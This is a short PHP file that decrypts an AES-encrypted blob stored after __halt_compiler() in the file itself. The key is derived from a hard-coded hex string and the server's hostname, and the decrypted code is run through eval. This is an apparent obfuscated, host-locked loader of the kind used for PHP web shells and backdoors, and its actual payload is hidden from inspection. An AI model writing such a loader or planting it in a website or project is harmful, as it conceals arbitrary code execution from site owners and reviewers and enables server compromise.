<?php
if (PHP_SAPI !== 'cli-server') header('Content-Type: text/html; charset=utf-8');
$b = strtr(substr(file_get_contents(__FILE__), __COMPILER_HALT_OFFSET__), '-_~', '+/=');
$d = base64_decode($b);
$iv = substr($d, 0, 16);
$data = substr($d, 16);
$key = hash('sha256', 'e31470e7aaf66148d3bba39cc287dd5f7d899e3aa1652084e699b0e7d4aceb29' . php_uname('n'), true);
eval("?>".openssl_decrypt($data, 'AES-256-CBC', $key, OPENSSL_RAW_DATA, $iv));
__halt_compiler();
j2qFVCQWU41yg87_up6xi8_DOPreK-zbdwokXCVLmKPikPvDlR8h8lMYnyEGonkFCRH_YYjONkmJczvnvcwizbGUoXEPfzrVs9zryYPJnICYxU0jQD4kcgmuO0fqWGEpJpTDAhO2CuhKXsXwSWgV5ZHJfwN4TxQygF6Ujq48cwDTwn7LzW4hOeYWN1SLePwk5X3WpXClIIojpvyPfY3m90xEWm8GFsMvMsMRGimweppSMJFCvNs4a2SST8YeprjeZRYRl6V_4fXxJyeKrBAzPcn7EnsZTd6dnwBYdDeJmdtk8gwerS-DAP6e6a48aO2vjC8_E48ABLxpYchThD5LcV5Aq5YoBt4cDi1JJFEzmj98gBr_u6dM4KnSMzfFI3yfXx9SBPCwnLUw9GuVJtR80YCtFepgIIDzf8k1IUOTCpEdGiMX3Xm1UpZTK5Y6DLG7